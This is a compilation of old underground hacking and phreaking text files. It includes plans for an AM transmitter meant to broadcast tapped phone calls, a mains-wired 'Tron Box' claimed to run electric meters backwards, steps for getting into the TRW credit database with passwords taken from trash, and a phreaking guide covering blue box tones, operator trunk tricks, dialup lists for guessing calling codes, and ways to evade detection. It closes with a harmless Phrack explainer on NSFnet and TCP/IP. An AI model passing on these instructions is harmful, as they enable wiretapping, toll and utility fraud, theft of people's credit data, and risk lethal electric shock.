365 pf variable capacitor · (1) Transistor antenna coil · (1) 2N366 transistor · (1) 2N464 transistor · (1) 100k resistor · (1) 5.6k resistor · (1) 10k resistor · (1) 2meg potentiometer with SPST switch · Some good wire, solder, soldering iron, board to put it on, box (optional) Schematic for The Lunch Box This may get a tad confusing but just print it out and pay attention. [!] ! 51 pf ! ---+---- ------------base collector ! )( 2N366 +----+------/\/\/----GND 365 pf () emitter ! ! )( ! ! +-------- ---+---- ! ! ! ! ! ! ! GND / .022mfd ! ! 10k\ ! ! ! / GND +------------------------emitter ! ! ! 2N464 / .0047 ! base collector 2meg \----+ ! ! +--------+ ! / ! GND ! ! ! GND ! ! ! +-------------+.0047+--------------------+ ! ! ! +--25mfd-----+ -----------------------------------------+ ! ! microphone +--/\/\/-----+ ---------------------------------------------+ 100k ! ! GND---->/<---------------------!+!+!+---------------+ switch Battery from 2meg pot. Notes about the schematic 1.GND means ground 2.The GND near the switch and the GND by the 2meg potentiometer should be connected. 3.Where you see: )( () )( it is the transistor antenna coil with 15 turns of regular hook-up wire around it. 4.The middle of the loop on the left side (the left of "()") you should run a wire down to the "+" which has nothing attached to it. There is a .0047 capacitor on the correct piece of wire. 5.For the microphone use a magnetic earphone (1k to 2k). 6.Where you see "[!]" is the antenna. Use about 8 feet of wire to broadcast approx. 300ft. Part 15 of the FCC rules and regulation says you can't broadcast over 300 feet without a license. (Hahaha). Use more wire for an antenna for longer distances. (Attach it to the black wire on the fone line for about a 250 foot antenna!) Operation of the Lunch Box This transmitter will send the signals over the AM radio band. You use the variable capacitor to adjust what freq. you want to use. Find a good unused freq. down at the lower end of the scale and you're set. Use the 2 meg pot. to adjust gain. Just fuck with it until you get what sounds good. The switch on the 2meg is for turning the Lunch Box on and off. When everything is adjusted, turn on an AM radio adjust it to where you think the signal is. Have a friend lay some shit thru the Box and tune in to it. That's all there is to it. The plans for a simple receiver are shown below: The Lunch Box receiver · (1) 9 volt battery with battery clip · (1) 365 pf variable capacitor · (1) 51 pf capacitor · (1) 1N38B diode · (1) Transistor antenna coil · (1) 2N366 transistor · (1) SPST toggle switch · (1) 1k to 2k magnetic earphone Schematic for receiver [!] ! 51 pf ! +----+----+ ! ! ) 365 pf (----+ ! ) ! ! +---------+---GND ! +---*>!----base collector----- diode 2N366 earphone emitter +----- ! ! GND ! - + - battery + GND------>/<------------+ switch Closing statement This two devices can be built for under a total of $10.00. Not too bad. Using these devices in illegal ways is your option. If you get caught, I accept NO responsibility for your actions. This can be a lot of fun if used correctly. Hook it up to the red wire on the phone line and it will send the conversation over the air waves. 118.Olive Box Plans by The Jolly Roger This is a relatively new box, and all it basically does is serve as a phone ringer. You have two choices for ringers, a piezoelectric transducer (ringer), or a standard 8 ohm speaker. The speaker has a more pleasant tone to it, but either will do fine. This circuit can also be used in conjunction with a rust box to control an external something or other when the phone rings. Just connect the 8 ohm speaker output to the inputs on the rust box, and control the pot to tune it to light the light (which can be replaced by a relay for external controlling) when the phone rings. ______________ | | ^ NC --|-- 5 4 --|-----/\/\/------->G | | / R2 G<----)|----|-- 6 3 --|-- NC | C3 | U1 | -------|-- 7 2 --|---------- --- -- - > TO RINGER | | ----|-- 8 1 --|-- | |______________| | | ---/\/\/----|(----- L1 | R1 C1 ------------------------------------------ L2 a. Main ringer TTL circuit (>::::::::::::::::::::::::::::::::::::::::::::::::::::::::<) _ FROM PIN 2 < - -- --- ----------| |_| |------------->G P1 b. Piezoelectric transducer (>::::::::::::::::::::::::::::::::::::::::::::::::::::::::<) __ /| FROM PIN 2 < - -- --- ---------|(---------. .-------| |/ | >||< |S1| | >||< --| | | >||< | |__|\ | G<---------.>||<.--- \| T1 c. Electromagnetic transducer Parts List · U1 - Texas Instruments TCM1506 · T1 - 4000:8 ohm audio transformer · S1 - 8 ohm speaker · R1 - 2.2k resistor · R2 - External variable resistor; adjusts timing frequency · C1 - .47uF capacitor · C2 - .1uF capacitor · C3 - 10uF capacitor · L1 - Tip · L2 - Ring · L1 and L2 are the phone line. Shift Rate: This is the formula for determining the shift rate: 1 1 SR = --------------------- = ------------ = 6 Hz (DSR(1/f1)+DSR(1/f2)) 128 128 ---- + ---- 1714 1500 · DSR = Shift Devider Rate ratio = 128 · f1 = High Output Frequency = 1714 · f2 = Low Output Frequency = 1500 119.The Tron Box by The GREAT Captain Crunch!! ------------------R-----F---- I I I I I I I I- (C) (C) (C) I I I I- I I I I ----------------------------- · (C)=capacitor · F =fuse · R =resistor · I,- are wire Parts List: · (3) electrolytic capacitors rated at 50V(lowest) .47UF · (1) 20-30 OHM « Watt resistor · (1) 120Volt fuse (amp rating best to use at least half of total house current or even less it keeps you from blowing your breaker just in case...) · (1) power cord (cut up an extension cord. Need plug part and wire) · (1) electrically insulated box for the rest of us. If your don't feel comfortable about electricity then don't play with this. There is voltage present that will ***kill you***. The thing works when the load in your house is low like at night time. It will put a reverse phase signal on the line and cancel out the other phase and put a reverse phase running everything in the house. Well if you have ever switched the power leads on a D\C (battery powered) motor you will see that it runs backwards well your electric meter sort of works this way...so reverse phase makes the meter slow down and if your lucky it will go backwards. Anyway it means a cheaper electric bill. 120.More TRW Info by The Jolly Roger TRW is a large database in which company's and banks can run credit checks on their customers. Example: John Jones orders $500 worth of stereo equipment from the Joe Blow Electronic distributing Co. Well it could be that he gave the company a phony credit card number, or doesn't have enough credit, etc. Well they call up TRW and then run a check on him, TRW then lists his card numbers (everything from sears to visa) and tells the numbers, credit, when he lost it last (if he ever did) and then of course tells if he has had any prior problems paying his bills. I would also like to add that although TRW contains information on millions of people, not every part of the country is served, although the major area are.. So if you hate someone and live in a small state, you probably wont be able to order him 300 pink toilet seats from K-mart. Logging on To log on, you dial-up your local access number (or long-distance, what ever turns you on) and wait for it to say "TRW" at this prompt, you type either an "A" or a "Ctrl-G" and it will say "circuit building in progress" it will wait for a minute and then clear the screen, now you will type one of the following. Tca1 Tca2 Tnj1 Tga1 This is to tell it what geographical area the customer is in, it really doesn't matter which you use, because TRW will automatically switch when it finds the record.. Next, you will type in the pswd and info on the person you are trying to get credit info on. You type it in a format like this: Rts Pswd Lname Fname ...,House number First letter of street name Zip now you type ctrl s and 2 ctrl-Q's here is what it looks like in real life: Ae: Dialing xxx-xxx-xxxx (screen clear) TRW ^G circuit building in progress (pause . . . screen clear) Tca1 Rtc 3966785-cm5 Johnson David ...,4567 R 56785 ^s ^q ^q and then it will wait for a few seconds and print out the file on him (if it can locate one for the guy) Note: You may have to push return when you first connect to get the systems attention. Getting Your Passwords To obtain pswds, you go down to your favorite bank or sears store and dig through the trash (hence the name trashing) looking for printouts, if they are a big enough place, and live in a TRW area, then they will probably have some. The printouts will have the 7 digit subscriber code, leaving the 3-4 digit pswd up to you. Much like trashing down at good old ma bell. 121.Phreaker's Phunhouse by the Jolly Roger The long awaited prequil to Phreaker's Guide has finally arrived. Conceived from the boredom and loneliness that could only be derived from: The Traveler! But now, he has returned in full strength (after a small vacation) and is here to 'World Premiere' the new files everywhere. Stay cool. This is the prequil to the first one, so just relax. This is not made to be an exclusive ultra elite file, so kinda calm down and watch in the background if you are too cool for it. Phreak Dictionary Here you will find some of the basic but necessary terms that should be known by any phreak who wants to be respected at all. Phreak: 1.The action of using mischievous and mostly illegal ways in order to not pay for some sort of telecommunications bill, order, transfer, or other service. It often involves usage of highly illegal boxes and machines in order to defeat the security that is set up to avoid this sort of happening. [fr'eaking]. v. 2.A person who uses the above methods of destruction and chaos in order to make a better life for all. A true phreaker will not go against his fellows or narc on people who have ragged on him or do anything termed to be dishonorable to phreaks. [fr'eek]. n. 3.A certain code or dialup useful in the action of being a phreak. (Example: "I hacked a new metro phreak last night.") Switching System: 1.There are 3 main switching systems currently employed in the US, and a few other systems will be mentioned as background. · SxS: This system was invented in 1918 and was employed in over half of the country until 1978. It is a very basic system that is a general waste of energy and hard work on the linesman. A good way to identify this is that it requires a coin in the phone booth before it will give you a dial tone, or that no call waiting, call forwarding, or any other such service is available. Stands for: Step by Step · XB: This switching system was first employed in 1978 in order to take care of most of the faults of SxS switching. Not only is it more efficient, but it also can support different services in various forms. XB1 is Crossbar Version 1. That is very limited and is hard to distinguish from SxS except by direct view of the wiring involved. Next up was XB4, Crossbar Version 4. With this system, some of the basic things like DTMF that were not available with SxS can be accomplished. For the final stroke of XB, XB5 was created. This is a service that can allow DTMF plus most 800 type services (which were not always available.) Stands for: Crossbar. · ESS: A nightmare in telecom. In vivid color, ESS is a pretty bad thing to have to stand up to. It is quite simple to identify. Dialing 911 for emergencies, and ANI [see ANI below] are the most common facets of the dread system. ESS has the capability to list in a person's caller log what number was called, how long the call took, and even the status of the conversation (modem or otherwise.) Since ESS has been employed, which has been very recently, it has gone through many kinds of revisions. The latest system to date is ESS 11a, that is employed in Washington D.C. for security reasons. ESS is truly trouble for any phreak, because it is 'smarter' than the other systems. For instance, if on your caller log they saw 50 calls to 1-800-421-9438, they would be able to do a CN/A [see Loopholes below] on your number and determine whether you are subscribed to that service or not. This makes most calls a hazard, because although 800 numbers appear to be free, they are recorded on your caller log and then right before you receive your bill it deletes the billings for them. But before that the are open to inspection, which is one reason why extended use of any code is dangerous under ESS. Some of the boxes [see Boxing below] are unable to function in ESS. It is generally a menace to the true phreak. Stands For: Electronic Switching System. Because they could appear on a filter somewhere or maybe it is just nice to know them anyways. · SSS: Strowger Switching System. First non-operator system available. · WES: Western Electronics Switching. Used about 40 years ago with some minor places out west. Boxing: 1.The use of personally designed boxes that emit or cancel electronical impulses that allow simpler acting while phreaking. Through the use of separate boxes, you can accomplish most feats possible with or without the control of an operator. 2.Some boxes and their functions are listed below. Ones marked with '*' indicate that they are not operatable in ESS. · *Black Box:Makes it seem to the phone company that the phone was never picked up. · Blue Box: Emits a 2600hz tone that allows you to do such things as stack a trunk line, kick the operator off line, and others. · Red Box: Simulates the noise of a quarter, nickel, or dime being dropped into a payphone. · Cheese Box: Turns your home phone into a pay phone to throw off traces (a red box is usually needed in order to call out.) · *Clear Box: Gives you a dial tone on some of the old SxS payphones without putting in a coin. · Beige Box: A simpler produced linesman's handset that allows you to tap into phone lines and extract by eavesdropping, or crossing wires, etc. · Purple Box: Makes all calls made out from your house seem to be local calls. ANI [ANI]: 1.Automatic Number Identification. A service available on ESS that allows a phone service [see Dialups below] to record the number that any certain code was dialed from along with the number that was called and print both of these on the customer bill. 2.dialups [see Dialups below] are all designed just to use ANI. Some of the services do not have the proper equipment to read the ANI impulses yet, but it is impossible to see which is which without being busted or not busted first. Dialups [dy'l'ups]: 1.Any local or 800 extended outlet that allows instant access to any service such as MCI, Sprint, or AT&T that from there can be used by hand-picking or using a program to reveal other peoples codes which can then be used moderately until they find out about it and you must switch to another code (preferably before they find out about it.) 2.Dialups are extremely common on both senses. Some dialups reveal the company that operates them as soon as you hear the tone. Others are much harder and some you may never be able to identify. A small list of dialups: 1-800-421-9438 (5 digit codes) 1-800-547-6754 (6 digit codes) 1-800-345-0008 (6 digit codes) 1-800-734-3478 (6 digit codes) 1-800-222-2255 (5 digit codes) 3.Codes: Codes are very easily accessed procedures when you call a dialup. They will give you some sort of tone. If the tone does not end in 3 seconds, then punch in the code and immediately following the code, the number you are dialing but strike the '1' in the beginning out first. If the tone does end, then punch in the code when the tone ends. Then, it will give you another tone. Punch in the number you are dialing, or a '9'. If you punch in a '9' and the tone stops, then you messed up a little. If you punch in a tone and the tone continues, then simply dial then number you are calling without the '1'. 4.All codes are not universal. The only type that I know of that is truly universal is Metrophone. Almost every major city has a local Metro dialup (for Philadelphia, (215)351-0100/0126) and since the codes are universal, almost every phreak has used them once or twice. They do not employ ANI in any outlets that I know of, so feel free to check through your books and call 555-1212 or, as a more devious manor, subscribe yourself. Then, never use your own code. That way, if they check up on you due to your caller log, they can usually find out that you are subscribed. Not only that but you could set a phreak hacker around that area and just let it hack away, since they usually group them, and, as a bonus, you will have their local dialup. 5.950's. They seem like a perfectly cool phreakers dream. They are free from your house, from payphones, from everywhere, and they host all of the major long distance companies (950)1044 , (950)1077 , 950-1088 , 950-1033 .) Well, they aren't. They were designed for ANI. That is the point, end of discussion. A phreak dictionary. If you remember all of the things contained on that file up there, you may have a better chance of doing whatever it is you do. This next section is maybe a little more interesting... Blue Box Plans: These are some blue box plans, but first, be warned, there have been 2600hz tone detectors out on operator trunk lines since XB4. The idea behind it is to use a 2600hz tone for a few very naughty functions that can really make your day lighten up. But first, here are the plans, or the heart of the file: 700 : 1 : 2 : 4 : 7 : 11 : 900 : + : 3 : 5 : 8 : 12 : 1100 : + : + : 6 : 9 : KP : 1300 : + : + : + : 10 : KP2 : 1500 : + : + : + : + : ST : : 700 : 900 :1100 :1300 :1500 : Stop! Before you diehard users start piecing those little tone tidbits together, there is a simpler method. If you have an Apple-Cat with a program like Cat's Meow IV, then you can generate the necessary tones, the 2600hz tone, the KP tone, the KP2 tone, and the ST tone through the dial section. So if you have that I will assume you can boot it up and it works, and I'll do you the favor of telling you and the other users what to do with the blue box now that you have somehow constructed it. The connection to an operator is one of the most well known and used ways of having fun with your blue box. You simply dial a TSPS (Traffic Service Positioning Station, or the operator you get when you dial '0') and blow a 2600hz tone through the line. Watch out! Do not dial this direct! After you have done that, it is quite simple to have fun with it. Blow a KP tone to start a call, a ST tone to stop it, and a 2600hz tone to hang up. Once you have connected to it, here are some fun numbers to call with it: 0-700-456-1000 Teleconference (free, because you are the operator!) (Area code)-101 Toll Switching (Area code)-121 Local Operator (hehe) (Area code)-131 Information (Area code)-141 Rate & Route (Area code)-181 Coin Refund Operator (Area code)-11511 Conference operator (when you dial 800-544-6363) Well, those were the tone matrix controllers for the blue box and some other helpful stuff to help you to start out with. But those are only the functions with the operator. There are other k-fun things you can do with it. More advanced Blue Box Stuff: Oops. Small mistake up there. I forgot tone lengths. Um, you blow a tone pair out for up to 1/10 of a second with another 1/10 second for silence between the digits. KP tones should be sent for 2/10 of a second. One way to confuse the 2600hz traps is to send pink noise over the channel (for all of you that have decent BSR equalizers, there is major pink noise in there.) Using the operator functions is the use of the 'inward' trunk line. That is working it from the inside. From the 'outward' trunk, you can do such things as make emergency breakthrough calls, tap into lines, busy all of the lines in any trunk (called 'stacking'), enable or disable the TSPS's, and for some 4a systems you can even re-route calls to anywhere. All right. The one thing that every complete phreak guide should be without is blue box plans, since they were once a vital part of phreaking. Another thing that every complete file needs is a complete listing of all of the 800 numbers around so you can have some more fun. /-/ 800 Dialup Listings /-/ 1-800-345-0008 (6) 1-800-547-6754 (6) 1-800-245-4890 (4) 1-800-327-9136 (4) 1-800-526-5305 (8) 1-800-858-9000 (3) 1-800-437-9895 (7) 1-800-245-7508 (5) 1-800-343-1844 (4) 1-800-322-1415 (6) 1-800-437-3478 (6) 1-800-325-7222 (6) All right, set Cat Hacker 1.0 on those numbers and have a fuck of a day. That is enough with 800 codes, by the time this gets around to you I don't know what state those codes will be in, but try them all out anyways and see what you get. On some 800 services now, they have an operator who will answer and ask you for your code, and then your name. Some will switch back and forth between voice and tone verification, you can never be quite sure which you will be up against. Armed with this knowledge you should be having a pretty good time phreaking now. But class isn't over yet, there are still a couple important rules that you should know. If you hear continual clicking on the line, then you should assume that an operator is messing with something, maybe even listening in on you. It is a good idea to call someone back when the phone starts doing that. If you were using a code, use a different code and/or service to call him back. A good way to detect if a code has gone bad or not is to listen when the number has been dialed. If the code is bad you will probably hear the phone ringing more clearly and more quickly than if you were using a different code. If someone answers voice to it then you can immediately assume that it is an operative for whatever company you are using. The famed '311311' code for Metro is one of those. You would have to be quite stupid to actually respond, because whoever you ask for the operator will always say 'He's not in right now, can I have him call you back?' and then they will ask for your name and phone number. Some of the more sophisticated companies will actually give you a carrier on a line that is supposed to give you a carrier and then just have garbage flow across the screen like it would with a bad connection. That is a feeble effort to make you think that the code is still working and maybe get you to dial someone's voice, a good test for the carrier trick is to dial a number that will give you a carrier that you have never dialed with that code before, that will allow you to determine whether the code is good or not. For our next section, a lighter look at some of the things that a phreak should not be without. A vocabulary. A few months ago, it was a quite strange world for the modem people out there. But now, a phreaker's vocabulary is essential if you wanna make a good impression on people when you post what you know about certain subjects. /-/ Vocabulary /-/ - Do not misspell except certain exceptions: phone -> fone freak -> phreak - Never substitute 'z's for 's's. (i.e. codez -> codes) - Never leave many characters after a post (i.e. Hey Dudes!#!@#@!#!@) - NEVER use the 'k' prefix (k-kool, k-rad, k-whatever) - Do not abbreviate. (I got lotsa wares w/ docs) - Never substitute '0' for 'o' (r0dent, l0zer). - Forget about ye old upper case, it looks ruggyish. All right, that was to relieve the tension of what is being drilled into your minds at the moment. Now, however, back to the teaching course. Here are some things you should know about phones and billings for phones, etc. LATA: Local Access Transference Area. Some people who live in large cities or areas may be plagued by this problem. For instance, let's say you live in the 215 area code under the 542 prefix (Ambler, Fort Washington). If you went to dial in a basic Metro code from that area, for instance, 351-0100, that might not be counted under unlimited local calling because it is out of your LATA. For some LATA's, you have to dial a '1' without the area code before you can dial the phone number. That could prove a hassle for us all if you didn't realize you would be billed for that sort of call. In that way, sometimes, it is better to be safe than sorry and phreak. The Caller Log: In ESS regions, for every household around, the phone company has something on you called a Caller Log. This shows every single number that you dialed, and things can be arranged so it showed every number that was calling to you. That's one main disadvantage of ESS, it is mostly computerized so a number scan could be done like that quite easily. Using a dialup is an easy way to screw that, and is something worth remembering. Anyways, with the caller log, they check up and see what you dialed. Hmm... you dialed 15 different 800 numbers that month. Soon they find that you are subscribed to none of those companies. But that is not the only thing. Most people would imagine "But wait! 800 numbers don't show up on my phone bill!". To those people, it is a nice thought, but 800 numbers are picked up on the caller log until right before they are sent off to you. So they can check right up on you before they send it away and can note the fact that you fucked up slightly and called one too many 800 lines. Right now, after all of that, you should have a pretty good idea of how to grow up as a good phreak. Follow these guidelines, don't show off, and don't take unnecessary risks when phreaking or hacking. 122.Phrack Magazine - Vol. 3, Issue 27 by Knight Lightning Prologue If you are not already familiar with NSFnet, I would suggest that you read: "Frontiers" (Phrack Inc., Volume Two, Issue 24, File 4 of 13), and definitely; "NSFnet: National Science Foundation Network" (Phrack Inc., Volume Three, Issue 26, File 4 of 11). Introduction MIDNET is a regional computer network that is part of the NSFnet, the National Science Foundation Network. Currently, eleven mid-United States universities are connected to each other and to the NSFnet via MIDnet: UA - University of Arkansas at Fayetteville ISU - Iowa State University at Ames UI - University of Iowa at Iowa City KSU - Kansas State University at Manhattan KU - University of Kansas at Lawrence UMC - University of Missouri at Columbia WU - Washington University at St. Louis, Missouri UNL - University of Nebraska at Lincoln OSU - Oklahoma State University at Stillwater UT - University of Tulsa (Oklahoma) OU - University of Oklahoma at Norman Researchers at any of these universities that have funded grants can access the six supercomputer centers funded by the NSF: John Von Neuman Supercomputer Center National Center for Atmospheric Research Cornell National Supercomputer Facility National Center for Supercomputing Applications Pittsburgh Supercomputing Center San Diego Supercomputing Center In addition, researchers and scientists can communicate with each other over a vast world-wide computer network that includes the NSFnet, ARPAnet, CSnet, BITnet, and others that you have read about in The Future Transcendent Saga. Please refer to "Frontiers" (Phrack Inc., Volume Two, Issue 24, File 4 of 13) for more details. MIDnet is just one of several regional computer networks that comprise the NSFnet system. Although all of these regional computer networks work the same, MIDnet is the only one that I have direct access to and so this file is written from a MIDnet point of view. For people who have access to the other regional networks of NSFnet, the only real differences depicted in this file that would not apply to the other regional networks are the universities that are served by MIDnet as opposed to: NYSERnet in New York State SURAnet in the southeastern United States SEQSUInet in Texas BARRnet in the San Francisco area MERIT in Michigan (There are others that are currently being constructed.) These regional networks all hook into the NSFnet backbone, which is a network that connects the six supercomputer centers. For example, a person at Kansas State University can connect with a supercomputer via MIDnet and the NSFnet backbone. That researcher can also send mail to colleagues at the University of Delaware by using MIDnet, NSFnet and SURAnet. Each university has its own local computer network which connects on-campus computers as well as providing a means to connecting to a regional network. Some universities are already connected to older networks such as CSnet, the ARPAnet and BITnet. In principal, any campus connected to any of these networks can access anyone else in any other network since there are gateways between the networks. Gateways are specialized computers that forward network traffic, thereby connecting networks. In practice, these wide-area networks use different networking technology which make it impossible to provide full functionality across the gateways. However, mail is almost universally supported across all gateways, so that a person at a BITnet site can send mail messages to a colleague at an ARPAnet site (or anywhere else for that matter). You should already be somewhat familiar with this, but if not refer to; "Limbo To Infinity" (Phrack Inc., Volume Two, Issue 24, File 3 of 13) and "Internet Domains" (Phrack Inc., Volume Three, Issue 26, File 8 of 11) Computer networks rely on hardware and software that allow computers to communicate. The language that enables network communication is called a protocol. There are many different protocols in use today. MIDnet uses the TCP/IP protocols, also known as the DOD (Department of Defense) Protocol Suite. Other networks that use TCP/IP include ARPAnet, CSnet and the NSFnet. In fact, all the regional networks that are linked to the NSFnet backbone are required to use TCP/IP. At the local campus level, TCP/IP is often used, although other protocols such as IBM's SNA and DEC's DECnet are common. In order to communicate with a computer via MIDnet and the NSFnet, a computer at a campus must use TCP/IP directly or use a gateway that will translate its protocols into TCP/IP. The Internet is a world-wide computer network that is the conglomeration of most of the large wide area networks, including ARPAnet, CSnet, NSFnet, and the regionals, such as MIDnet. To a lesser degree, other networks such as BITnet that can send mail to hosts on these networks are included as part of the Internet. This huge network of networks, the Internet, as you have by now read all about in the pages of Phrack Inc., is a rapidly growing and very complex entity that allows sophisticated communication between scientists, students, government officials and others. Being a part of this community is both exciting and challenging. This chapter of the Future Transcendent Saga gives a general description of the protocols and software used in MIDnet and the NSFNet. A discussion of several of the more commonly used networking tools is also included to enable you to make practical use of the network as soon as possible. The DOD Protocol Suite The DOD Protocol Suite includes many different protocols. Each protocol is a specification of how communication is to occur between computers. Computer hardware and software vendors use the protocol to create programs and sometimes specialized hardware in order to implement the network function intended by the protocol. Different implementations of the same protocol exist for the varied hardware and operating systems found in a network. The three most commonly used network functions are: Mail -- Sending and receiving messages File Transfer -- Sending and receiving files Remote Login -- Logging into a distant computer Of these, mail is probably the most commonly used. In the TCP/IP world, there are three different protocols that realize these functions: SMTP -- (Simple Mail Transfer Protocol) Mail FTP -- (File Transfer Protocol) sending and receiving files Telnet -- Remote login How to use these protocols is discussed in the next section. At first glance, it is not obvious why these three functions are the most common. After all, mail and file transfer seem to be the same thing. However, mail messages are not identical to files, since they are usually comprised of only ASCII characters and are sequential in structure. Files may contain binary data and have complicated, non-sequential structures. Also, mail messages can usually tolerate some errors in transmission whereas files should not contain any errors. Finally, file transfers usually occur in a secure setting (i.e. The users who are transferring files know each other's names and passwords and are permitted to transfer the file, whereas mail can be sent to anybody as long as their name is known). While mail and transfer accomplish the transfer of raw information from one computer to another, Telnet allows a distant user to process that information, either by logging in to a remote computer or by linking to another terminal. Telnet is most often used to remotely log in to a distant computer, but it is actually a general-purpose communications protocol. I have found it incredibly useful over the last year. In some ways, it could be used for a great deal of access because you can directly connect to another computer anywhere that has TCP/IP capabilities, however please note that Telnet is *NOT* Telenet. There are other functions that some networks provide, including the following: · Name to address translation for networks, computers and people · The current time · Quote of the day or fortune · Printing on a remote printer, or use of any other remote peripheral · Submission of batch jobs for non-interactive execution · Dialogues and conferencing between multiple users · Remote procedure call (i.e. Distributing program execution over several remote computers) · Transmission of voice or video information Some of these functions are still in the experimental stages and require faster computer networks than currently exist. In the future, new functions will undoubtedly be invented and existing ones improved. The DOD Protocol Suite is a layered network architecture, which means that network functions are performed by different programs that work independently and in harmony with each other. Not only are there different programs but there are different protocols. The protocols SMTP, FTP and Telnet are described above. Protocols have been defined for getting the current time, the quote of the day, and for translating names. These protocols are called applications protocols because users directly interact with the programs that implement these protocols. The Transmission Control Protocol, TCP, is used by many of the application protocols. Users almost never interact with TCP directly. TCP establishes a reliable end-to-end connection between two processes on remote computers. Data is sent through a network in small chunks called packets to improve reliability and performance. TCP ensures that packets arrive in order and without errors. If a packet does have errors, TCP requests that the packet be retransmitted. In turn, TCP calls upon IP, Internet Protocol, to move the data from one network to another. IP is still not the lowest layer of the architecture, since there is usually a "data link layer protocol" below it. This can be any of a number of different protocols, two very common ones being X.25 and Ethernet. FTP, Telnet and SMTP are called "application protocols", since they are directly used by applications programs that enable users to make use of the network. Network applications are the actual programs that implement these protocols and provide an interface between the user and the computer. An implementation of a network protocol is a program or package of programs that provides the desired network function such as file transfer. Since computers differ from vendor to vendor (e.g. IBM, DEC, CDC), each computer must have its own implementation of these protocols. However, the protocols are standardized so that computers can interpolate over the network (i.e. Can understand and process each other's data). For example, a TCP packet generated by an IBM computer can be read and processed by a DEC computer. In many instances, network applications programs use the name of the protocol. For example, the program that transfers files may be called "FTP" and the program that allows remote logins may be called "Telnet." Sometimes these protocols are incorporated into larger packages, as is common with SMTP. Many computers have mail programs that allow users on the same computer to send mail to each other. SMTP functions are often added to these mail programs so that users can also send and receive mail through a network. In such cases, there is no separate program called SMTP that the user can access, since the mail program provides the user interface to this network function. Specific implementation of network protocols, such as FTP, are tailored to the computer hardware and operating system on which they are used. Therefore, the exact user interface varies from one implementation to another. For example, the FTP protocol specifies a set of FTP commands which each FTP implementation must understand and process. However, these are usually placed at a low level, often invisible to the user, who is given a higher set of commands to use. These higher-level commands are not standardized so they may vary from one implementation of FTP to another. For some operating systems, not all of these commands make equal sense, such as "Change Directory," or may have different meanings. Therefore the specific user interface that the user sees will probably differ. This file describes a generic implementation of the standard TCP/IP application protocols. Users must consult local documentation for specifics at their sites. Names and Addresses In A Network In DOD Protocol Suite, each network is given a unique identifying number. This number is assigned by a central authority, namely the Network Information Center run by SRI, abbreviated as SRI-NIC, in order to prevent more than one network from having the same network number. For example, the ARPAnet has network number 10 while MIDnet has a longer number, namely 128.242. Each host in a network has a unique identification so other hosts can specify them unambiguously. Host numbers are usually assigned by the organization that manages the network, rather than one central authority. Host numbers do not need to be unique throughout the whole Internet but two hosts on the same network need to have unique host numbers. The combination of the network number and the host number is called the IP address of the host and is specified as a 32-bit binary number. All IP addresses in the Internet are expressible as 32-bit numbers, although they are often written in dotted decimal notation. Dotted decimal notation breaks the 32-bit number into four eight-bit parts or octets and each octet is specified as a decimal number. For example, 00000001 is the binary octet that specifies the decimal number 1, while 11000000 specifies 192. Dotted decimal notation makes IP addresses much easier to read and remember. Computers in the Internet are also identified by hostnames, which are strings of characters, such as "phrackvax." However, IP packets must specify the 32-bit IP address instead of the hostname so some way to translating hostnames to IP addresses must exist. One way is to have a table of hostnames and their corresponding IP addresses, called a hosttable. Nearly every TCP/IP implementation has such a hosttable, although the weaknesses of this method are forcing a shift to a new scheme called the domain name system. In UNIX systems, the hosttable is often called "/etc/hosts." You can usually read this file and find out what the IP addresses of various hosts are. Other systems may call this file by a different name and make it unavailable for public viewing. Users of computers are generally given accounts to which all charges for computer use are billed. Even if computer time is free at an installation, accounts are used to distinguish between the users and enforce file protections. The generic term "username" will be used in this file to refer to the name by which the computer account is accessed. In the early days of the ARPAnet which was the first network to use the TCP/IP protocols, computer users were identified by their username, followed by a commercial "at" sign (@), followed by the hostname on which the account existed. Networks were not given names, per se, although the IP address specified a network number. For example, "knight@phrackvax" referred to user "knight" on host "phrackvax." This did not specify which network "phrackvax" was on, although that information could be obtained by examining the hosttable and the IP address for "phrackvax." (However, "phrackvax" is a fictitious hostname used for this presentation.) As time went on, every computer on the network had to have an entry in its hosttable for every other computer on the network. When several networks linked together to form the Internet, the problem of maintaining this central hosttable got out of hand. Therefore, the domain name scheme was introduced to split up the hosttable and make it smaller and easier to maintain. In the new domain name scheme, users are still identified by their usernames, but hosts are now identified by their hostname and any and all domains of which they are a part. For example, the address "KNIGHT@UMCVMB.MISSOURI.EDU" specifies username "KNIGHT" on host "UMCVMB". However, host "UMCVMB" is a part of the domain "MISSOURI" " which is in turn part of the domain "EDU". There are other domains in "EDU", although only one is named "MISSOURI". In the domain "MISSOURI", there is only one host named "UMCVMB". However, other domains in "EDU" could theoretically have hosts named "UMCVMB" (although I would say that this is rather unlikely in this example). Thus the combination of hostname and all its domains makes it unique. The method of translating such names into IP addresses is no longer as straightforward as looking up the hostname in a table. Several protocols and specialized network software called nameservers and resolvers implement the domain name scheme. Not all TCP/IP implementations support domain names because it is rather new. In those cases, the local hosttable provides the only way to translate hostnames to IP addresses. The system manager of that computer will have to put an entry into the hosttable for every host that users may want to connect to. In some cases, users may consult the nameserver themselves to find out the IP address for a given hostname and then use that IP address directly instead of a hostname. I have selected a few network hosts to demonstrate how a host system can be specified by both the hostname and host numerical address. Some of the nodes I have selected are also nodes on BITnet, perhaps even some of the others that I do not make a note of due a lack of omniscient awareness about each and every single host system in the world :-) Numerical BITnet Hostname Location 18.72.0.39 ATHENA.MIT.EDU Mass. Institute of Technology MIT 26.0.0.73 SRI-NIC.ARPA DDN Network Information Center - 36.21.0.13 MACBETH.STANFORD.EDU Stanford University ? 36.21.0.60 PORTIA.STANFORD.EDU Stanford University ? 128.2.11.131 ANDREW.CMU.EDU Carnegie Mellon Univ. ANDREW 128.3.254.13 LBL.GOV Lawrence Berkeley Labrotories LBL 128.6.4.7 RUTGERS.RUTGERS.EDU Rutgers University ? 128«9.99.1 CUCARD.MED.COLUMBIA.EDU Columbia University ? 128.102.18.3 AMES.ARC.NASA.GOV Ames Research Center [NASA] - 128.103.1.1 HARVARD.EDU Harvard University HARVARD 128.111.24.40 HUB.UCSB.EDU Univ. Of Santa Barbara ? 128.115.14.1 LLL-WINKEN.LLNL.GOV Lawrence Livermore Labratories - 128.143.2.7 UVAARPA.VIRGINIA.EDU University of Virginia ? 128.148.128.40 BROWNVM.BROWN.EDU Brown University BROWN 128.163.1« UKCC.UKY.EDU University of Kentucky UKCC 128.183.10.4 NSSDCA.GSFC.NASA.GOV Goddard Space Flight Center [NASA]- 128.186.4.18 RAI.CC.FSU.EDU Florida State University FSU 128.206.1.1 UMCVMB.MISSOURI.EDU Univ. of MissouriColumbia UMCVMB 128.208.1.15 MAX.ACS.WASHINGTON.EDU University of Washington MAX 128.228.1.2 CUNYVM.CUNY.EDU City University of New York CUNYVM 